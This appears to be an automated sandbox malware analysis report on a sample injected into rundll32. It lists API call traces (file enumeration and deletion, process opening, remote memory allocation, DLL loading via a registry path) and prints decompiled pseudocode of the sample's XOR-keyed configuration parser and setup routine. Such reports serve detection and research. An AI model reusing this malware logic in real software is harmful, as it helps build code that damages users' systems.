                          • Opcode ID: d9bb14fada165b096fbf15f93da4acbe204d76277e7f57e33c0b4308d2b13e4f
                          • Instruction ID: 67c3043a29e9d81a0d986367901c64cf5309f9c6aa434356d4a9d8f74b7e1ffa
                          • Opcode Fuzzy Hash: d9bb14fada165b096fbf15f93da4acbe204d76277e7f57e33c0b4308d2b13e4f
                          • Instruction Fuzzy Hash: CDD01730E01219EBCB20AF98DC4A9AEFBB1BF08721F608264E860731D0C7302916CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                            • Part of subcall function 05B721B6: ExpandEnvironmentStringsW.KERNEL32(05B6AEB5,00000000,00000000,00000001,00000000,00000000,05B6E448,05B6AEB5,00000000,05B6E448,?), ref: 05B721CD
                            • Part of subcall function 05B721B6: ExpandEnvironmentStringsW.KERNEL32(05B6AEB5,00000000,00000000,00000000), ref: 05B721E7
                          • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                          • lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                          • memset.NTDLL ref: 05B7BB71
                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                          • lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                          • lstrlenW.KERNEL32(?), ref: 05B7BBCC
                          • memset.NTDLL ref: 05B7BBEF
                          • wcscpy.NTDLL ref: 05B7BC01
                          • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05B7BC27
                          • RtlEnterCriticalSection.NTDLL(?), ref: 05B7BC5D
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05B7BC79
                          • FindNextFileW.KERNEL32(?,00000000), ref: 05B7BC92
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B7BCA4
                          • FindClose.KERNEL32(?), ref: 05B7BCB9
                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BCCD
                          • lstrlenW.KERNEL32(0000002C), ref: 05B7BCEF
                          • FindNextFileW.KERNEL32(?,00000000), ref: 05B7BD65
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B7BD77
                          • FindClose.KERNEL32(?), ref: 05B7BD92
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                          • String ID:
                          • API String ID: 2962561936-0
                          • Opcode ID: cdfc4c0317f6b970399b304cf06702990d4948e6108285e479e478592ce2f14a
                          • Instruction ID: 5186629dc159873cf0f7b361439e7ed5dd724ea2ece88d3c0ce7a0207ee9344f
                          • Opcode Fuzzy Hash: cdfc4c0317f6b970399b304cf06702990d4948e6108285e479e478592ce2f14a
                          • Instruction Fuzzy Hash: 40814C71508349AFC720AF24DC89A2BBBE9FF88304F444859F5A697151EB74F905CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 05B610FA
                          • GetLastError.KERNEL32 ref: 05B61108
                          • NtSetInformationProcess.NTDLL ref: 05B61162
                          • GetProcAddress.KERNEL32(?,00000000), ref: 05B611A1
                          • GetProcAddress.KERNEL32(?), ref: 05B611C2
                          • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 05B61219
                          • CloseHandle.KERNEL32(?), ref: 05B6122F
                          • CloseHandle.KERNEL32(?), ref: 05B61255
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                          • String ID: v
                          • API String ID: 3529370251-1801730948
                          • Opcode ID: 4cbe8c4979751adfda413fbf772c5edee0a46c6292432f5f4124e0e9671a093b
                          • Instruction ID: f66a8dbd1c685321df1e410434146bd2b0d62debcc7b7f326643cd5089550068
                          • Opcode Fuzzy Hash: 4cbe8c4979751adfda413fbf772c5edee0a46c6292432f5f4124e0e9671a093b
                          • Instruction Fuzzy Hash: 4041BD71108345AFD711EF28C889A2ABFF6FB88318F104A6AF555E3150DB74FA49CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B270
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B2A2
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B2D4
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B306
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B338
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B36A
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B39C
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B3CE
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B400
                          • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 05B6B593
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 05B6B637
                            • Part of subcall function 05B77736: RtlAllocateHeap.NTDLL ref: 05B77777
                            • Part of subcall function 05B77736: memset.NTDLL ref: 05B7778B
                            • Part of subcall function 05B77736: GetCurrentThreadId.KERNEL32 ref: 05B77818
                            • Part of subcall function 05B77736: GetCurrentThread.KERNEL32 ref: 05B7782B
                            • Part of subcall function 05B66537: RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B66540
                            • Part of subcall function 05B66537: HeapFree.KERNEL32(00000000,?), ref: 05B66572
                            • Part of subcall function 05B66537: RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B66590
                          • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 05B6B5DF
                            • Part of subcall function 05B6D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,05B6DA7B,?), ref: 05B6D4E3
                            • Part of subcall function 05B6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 05B6D506
                            • Part of subcall function 05B6D4DA: memset.NTDLL ref: 05B6D515
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                          • String ID:
                          • API String ID: 3296958911-0
                          • Opcode ID: 6b835ca91c4a9976b06f09e352fc046a032a74624ff6834290324fd704e12a0f
                          • Instruction ID: a4d258dc8ae9f5220253b8c0defbb8309e18941f8fa7029457355e3d5144eca4
                          • Opcode Fuzzy Hash: 6b835ca91c4a9976b06f09e352fc046a032a74624ff6834290324fd704e12a0f
                          • Instruction Fuzzy Hash: C4F190B1B24215ABCB10FBB48885D7F77FAFB0865075549A5B902EB200EE38F941C7A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • wcscpy.NTDLL ref: 05B6FD7B
                          • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 05B6FD87
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B6FD98
                          • memset.NTDLL ref: 05B6FDB5
                          • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 05B6FDC3
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B6FDD1
                          • GetDriveTypeW.KERNEL32(?), ref: 05B6FDDF
                          • lstrlenW.KERNEL32(?), ref: 05B6FDEB
                          • wcscpy.NTDLL ref: 05B6FDFD
                          • lstrlenW.KERNEL32(?), ref: 05B6FE17
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6FE30
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                          • String ID:
                          • API String ID: 3888849384-0
                          • Opcode ID: 1e3015710565578f945736a821f7e13da84f9f976fd9286ebaf1d225090983b7
                          • Instruction ID: 1b115ceb00eee17bdcfba22f1d7e99cee35692aabaf24a113241a8b591aa26be
                          • Opcode Fuzzy Hash: 1e3015710565578f945736a821f7e13da84f9f976fd9286ebaf1d225090983b7
                          • Instruction Fuzzy Hash: 2D311676810108BFDB11ABA4E889CBEBFBEFB09224B105466F501A7151EA35BE45DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 05B6EC1B
                          • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 05B6ECD3
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 05B6EC69
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B6EC82
                          • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 05B6ECA1
                          • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 05B6ECB3
                          • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 05B6ECBB
                          Strings
                          • Software\Microsoft\WAB\DLLPath, xrefs: 05B6EC0C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                          • String ID: Software\Microsoft\WAB\DLLPath
                          • API String ID: 1628847533-3156921957
                          • Opcode ID: 5139b666702245fffa22d26b0aa4216bbbdba280eac7f22f94a97296e77ab38e
                          • Instruction ID: 3e823bee74ff072373781e5499517fc2a2e4117c28da25fd420cbad1b1af86b0
                          • Opcode Fuzzy Hash: 5139b666702245fffa22d26b0aa4216bbbdba280eac7f22f94a97296e77ab38e
                          • Instruction Fuzzy Hash: 4F219275900518FFCB21ABA8DC99CBFBF7EEB84650B1401A1F912A7210EA35BE40DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E01001645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                          				int _v8;
                          				void* _v12;
                          				void* _v16;
                          				signed int _t28;
                          				signed int _t33;
                          				signed int _t39;
                          				char* _t45;
                          				char* _t46;
                          				char* _t47;
                          				char* _t48;
                          				char* _t49;
                          				char* _t50;
                          				void* _t51;
                          				void* _t52;
                          				void* _t53;
                          				intOrPtr _t54;
                          				void* _t56;
                          				intOrPtr _t57;
                          				intOrPtr _t58;
                          				signed int _t61;
                          				intOrPtr _t64;
                          				signed int _t65;
                          				signed int _t70;
                          				void* _t72;
                          				void* _t73;
                          				signed int _t75;
                          				signed int _t78;
                          				signed int _t82;
                          				signed int _t86;
                          				signed int _t90;
                          				signed int _t94;
                          				signed int _t98;
                          				void* _t101;
                          				void* _t102;
                          				void* _t115;
                          				void* _t118;
                          				intOrPtr _t121;
                          
                          				_t118 = __esi;
                          				_t115 = __edi;
                          				_t104 = __ecx;
                          				_t101 = __ebx;
                          				_t28 =  *0x100a344; // 0x69b25f44
                          				if(E01007780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                          					 *0x100a378 = _v8;
                          				}
                          				_t33 =  *0x100a344; // 0x69b25f44
                          				if(E01007780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                          					_v12 = 2;
                          					L69:
                          					return _v12;
                          				}
                          				_t39 =  *0x100a344; // 0x69b25f44
                          				_push(_t115);
                          				if(E01007780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                          					L67:
                          					HeapFree( *0x100a2d8, 0, _v16);
                          					goto L69;
                          				} else {
                          					_push(_t101);
                          					_t102 = _v12;
                          					if(_t102 == 0) {
                          						_t45 = 0;
                          					} else {
                          						_t98 =  *0x100a344; // 0x69b25f44
                          						_t45 = E01005450(_t104, _t102, _t98 ^ 0x7895433b);
                          					}
                          					_push(_t118);
                          					if(_t45 != 0) {
                          						_t104 =  &_v8;
                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                          							 *0x100a2e0 = _v8;
                          						}
                          					}
                          					if(_t102 == 0) {
                          						_t46 = 0;
                          					} else {
                          						_t94 =  *0x100a344; // 0x69b25f44
                          						_t46 = E01005450(_t104, _t102, _t94 ^ 0x219b08c7);
                          					}
                          					if(_t46 != 0) {
                          						_t104 =  &_v8;
                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                          							 *0x100a2e4 = _v8;
                          						}
                          					}
                          					if(_t102 == 0) {
                          						_t47 = 0;
                          					} else {
                          						_t90 =  *0x100a344; // 0x69b25f44
                          						_t47 = E01005450(_t104, _t102, _t90 ^ 0x31fc0661);
                          					}
                          					if(_t47 != 0) {
                          						_t104 =  &_v8;
                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                          							 *0x100a2e8 = _v8;
                          						}
                          					}
                          					if(_t102 == 0) {
                          						_t48 = 0;
                          					} else {
                          						_t86 =  *0x100a344; // 0x69b25f44
                          						_t48 = E01005450(_t104, _t102, _t86 ^ 0x0cd926ce);
                          					}
                          					if(_t48 != 0) {
                          						_t104 =  &_v8;
                          						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                          							 *0x100a004 = _v8;
                          						}
                          					}
                          					if(_t102 == 0) {
                          						_t49 = 0;
                          					} else {
                          						_t82 =  *0x100a344; // 0x69b25f44
                          						_t49 = E01005450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                          					}
                          					if(_t49 != 0) {
                          						_t104 =  &_v8;
                          						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                          							 *0x100a02c = _v8;
                          						}
                          					}
                          					if(_t102 == 0) {
                          						_t50 = 0;
                          					} else {
                          						_t78 =  *0x100a344; // 0x69b25f44
                          						_t50 = E01005450(_t104, _t102, _t78 ^ 0x2878b929);
                          					}
                          					if(_t50 == 0) {
                          						L41:
                          						 *0x100a2ec = 5;
                          						goto L42;
                          					} else {
                          						_t104 =  &_v8;
                          						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                          							goto L41;
                          						} else {
                          							L42:
                          							if(_t102 == 0) {
                          								_t51 = 0;
                          							} else {
                          								_t75 =  *0x100a344; // 0x69b25f44
                          								_t51 = E01005450(_t104, _t102, _t75 ^ 0x261a367a);
                          							}
                          							if(_t51 != 0) {
                          								_push(_t51);
                          								_t72 = 0x10;
                          								_t73 = E01002FBC(_t72);
                          								if(_t73 != 0) {
                          									_push(_t73);
                          									E010072C7();
                          								}
                          							}
                          							if(_t102 == 0) {
                          								_t52 = 0;
                          							} else {
                          								_t70 =  *0x100a344; // 0x69b25f44
                          								_t52 = E01005450(_t104, _t102, _t70 ^ 0xb9d404b2);
                          							}
                          							if(_t52 != 0 && E01002FBC(0, _t52) != 0) {
                          								_t121 =  *0x100a3cc; // 0x52995b0
                          								E0100765B(_t121 + 4, _t68);
                          							}
                          							if(_t102 == 0) {
                          								_t53 = 0;
                          							} else {
                          								_t65 =  *0x100a344; // 0x69b25f44
                          								_t53 = E01005450(_t104, _t102, _t65 ^ 0x3df17130);
                          							}
                          							if(_t53 == 0) {
                          								L59:
                          								_t54 =  *0x100a348; // 0x428d5a8
                          								_t22 = _t54 + 0x100b252; // 0x616d692f
                          								 *0x100a374 = _t22;
                          								goto L60;
                          							} else {
                          								_t64 = E01002FBC(0, _t53);
                          								 *0x100a374 = _t64;
                          								if(_t64 != 0) {
                          									L60:
                          									if(_t102 == 0) {
                          										_t56 = 0;
                          									} else {
                          										_t61 =  *0x100a344; // 0x69b25f44
                          										_t56 = E01005450(_t104, _t102, _t61 ^ 0xd2079859);
                          									}
                          									if(_t56 == 0) {
                          										_t57 =  *0x100a348; // 0x428d5a8
                          										_t23 = _t57 + 0x100b79e; // 0x6976612e
                          										_t58 = _t23;
                          									} else {
                          										_t58 = E01002FBC(0, _t56);
                          									}
                          									 *0x100a3e0 = _t58;
                          									HeapFree( *0x100a2d8, 0, _t102);
                          									_v12 = 0;
                          									goto L67;
                          								}
                          								goto L59;
                          							}
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010016EA
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0100171C
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0100174E
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01001780
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010017B2
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010017E4
                          • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010018E3
                          • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010018F7
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: b9c31f7fb3d2af706915fbfa725b820f35108f2c8617d8990f06b119d664e045
                          • Instruction ID: 768052cf464316763ca2876af58978b98943eb9fa568c1ab5427e8d2d138ca19
                          • Opcode Fuzzy Hash: b9c31f7fb3d2af706915fbfa725b820f35108f2c8617d8990f06b119d664e045
                          • Instruction Fuzzy Hash: 8581A274B00205EBF763DBB8DD88D9F7BF9BB48740F244965B185D3184EA7AEA448B10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,05B62028,?), ref: 05B6867A
                            • Part of subcall function 05B68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,05B62028,?), ref: 05B68697
                          • FreeLibrary.KERNEL32(?), ref: 05B666F8
                            • Part of subcall function 05B7AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,05B6663D,?,?), ref: 05B7AFCF
                            • Part of subcall function 05B7AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,05B6663D,?,?), ref: 05B7AFF8
                            • Part of subcall function 05B7AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 05B7B018
                            • Part of subcall function 05B7AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 05B7B034
                            • Part of subcall function 05B7AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,05B6663D,?,?), ref: 05B7B040
                            • Part of subcall function 05B7AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,05B6663D,?,?), ref: 05B7B043
                            • Part of subcall function 05B7AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,05B6663D,?,?), ref: 05B7B04F
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B06C
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B086
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B09C
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0B2
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0C8
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0DE
                          • FindFirstFileW.KERNEL32(?,?,?,?), ref: 05B6664E
                          • lstrlenW.KERNEL32(?), ref: 05B6666A
                          • lstrlenW.KERNEL32(?), ref: 05B66682
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B6669B
                          • lstrcpyW.KERNEL32(00000002), ref: 05B666B0
                            • Part of subcall function 05B81C9B: lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,05B666C0,?,00000000,?), ref: 05B81CAB
                            • Part of subcall function 05B81C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05B666C0,?,00000000,?), ref: 05B81CCD
                            • Part of subcall function 05B81C9B: lstrcpyW.KERNEL32(00000000,?), ref: 05B81CF9
                            • Part of subcall function 05B81C9B: lstrcatW.KERNEL32(00000000,?), ref: 05B81D0C
                          • FindNextFileW.KERNEL32(?,00000010), ref: 05B666D8
                          • FindClose.KERNEL32(00000002), ref: 05B666E6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                          • String ID:
                          • API String ID: 1209511739-0
                          • Opcode ID: ae4a7d231a1e17be1bfee89806bd4c27f7ba67779300cf9e9052460bb19ef7ed
                          • Instruction ID: 1b11d1b17c9b4ce10cb821788addbb86afe93c9b912c28f99a4c39aedbfb05d7
                          • Opcode Fuzzy Hash: ae4a7d231a1e17be1bfee89806bd4c27f7ba67779300cf9e9052460bb19ef7ed
                          • Instruction Fuzzy Hash: 89416A71508345ABC711EF60E848A6FBBE9FF84B04F040969F594E3150EB34E909CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(?,00000000), ref: 05B699D4
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05B69A3D
                          • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 05B69A65
                          • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 05B69AB7
                          • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 05B69AC2
                          • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05B69AD5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                          • String ID:
                          • API String ID: 499515686-0
                          • Opcode ID: a9b3913b9a7213c70ff17033a4e05d55699d7813f2fc9a02c940680b791c91e6
                          • Instruction ID: 10bb3dbfa22539956267fdf58443d0a7dd2b6f6315da5ec4eb36f5c9e0b0457d
                          • Opcode Fuzzy Hash: a9b3913b9a7213c70ff17033a4e05d55699d7813f2fc9a02c940680b791c91e6
                          • Instruction Fuzzy Hash: 9941177590020AEFDF11EFA4CD89AAE7FB9FF00354F1440A5E511AB190EB78EA44DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B7EAE7
                            • Part of subcall function 05B77950: NtAllocateVirtualMemory.NTDLL(05B7EB0F,00000000,00000000,05B7EB0F,00003000,00000040), ref: 05B77981
                            • Part of subcall function 05B77950: RtlNtStatusToDosError.NTDLL(00000000), ref: 05B77988
                            • Part of subcall function 05B77950: SetLastError.KERNEL32(00000000), ref: 05B7798F
                          • GetLastError.KERNEL32(?,00000318,00000008), ref: 05B7EBF7
                            • Part of subcall function 05B636BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 05B636D3
                          • memcpy.NTDLL(00000218,05B838A0,00000100,?,00010003,?,?,00000318,00000008), ref: 05B7EB76
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05B7EBD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                          • String ID:
                          • API String ID: 2966525677-3916222277
                          • Opcode ID: e26b40ba1b623cd9b24f1d6cd11f6f190ee6f775ea62ed7e604f76376e8335ec
                          • Instruction ID: de5eb73b6b8a31726931d03c2b1a6e909232c55f2f15cf7c609173b10206a307
                          • Opcode Fuzzy Hash: e26b40ba1b623cd9b24f1d6cd11f6f190ee6f775ea62ed7e604f76376e8335ec
                          • Instruction Fuzzy Hash: 64313075A01209AFDB20DF64D9C9AAABBB9FF04214F1049EAE556D7240DB30FA48CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: 4b703edb592c745c2d46ad4fdd38d3a6257b7eb6a24955c6a88058c7cd1090c8
                          • Instruction ID: b186cb6ce198df9168d15b5ecaa89cff6892fc585d0a78bac49d1e18007971f1
                          • Opcode Fuzzy Hash: 4b703edb592c745c2d46ad4fdd38d3a6257b7eb6a24955c6a88058c7cd1090c8
                          • Instruction Fuzzy Hash: 18F1DF70604B99DFCB31CF68C988AAABBF4FF51340F2449ADC5E796681D231BA45CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01006D78(intOrPtr _a4) {
                          				void* _t2;
                          				unsigned int _t4;
                          				void* _t5;
                          				long _t6;
                          				void* _t7;
                          				void* _t15;
                          
                          				_t2 = CreateEventA(0, 1, 0, 0);
                          				 *0x100a30c = _t2;
                          				if(_t2 == 0) {
                          					return GetLastError();
                          				}
                          				_t4 = GetVersion();
                          				if(_t4 != 5) {
                          					L4:
                          					if(_t15 <= 0) {
                          						_t5 = 0x32;
                          						return _t5;
                          					}
                          					L5:
                          					 *0x100a2fc = _t4;
                          					_t6 = GetCurrentProcessId();
                          					 *0x100a2f8 = _t6;
                          					 *0x100a304 = _a4;
                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                          					 *0x100a2f4 = _t7;
                          					if(_t7 == 0) {
                          						 *0x100a2f4 =  *0x100a2f4 | 0xffffffff;
                          					}
                          					return 0;
                          				}
                          				if(_t4 >> 8 > 0) {
                          					goto L5;
                          				}
                          				_t15 = _t4 - _t4;
                          				goto L4;
                          			}

                          APIs
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01001D07,?), ref: 01006D80
                          • GetVersion.KERNEL32 ref: 01006D8F
                          • GetCurrentProcessId.KERNEL32 ref: 01006DAB
                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01006DC8
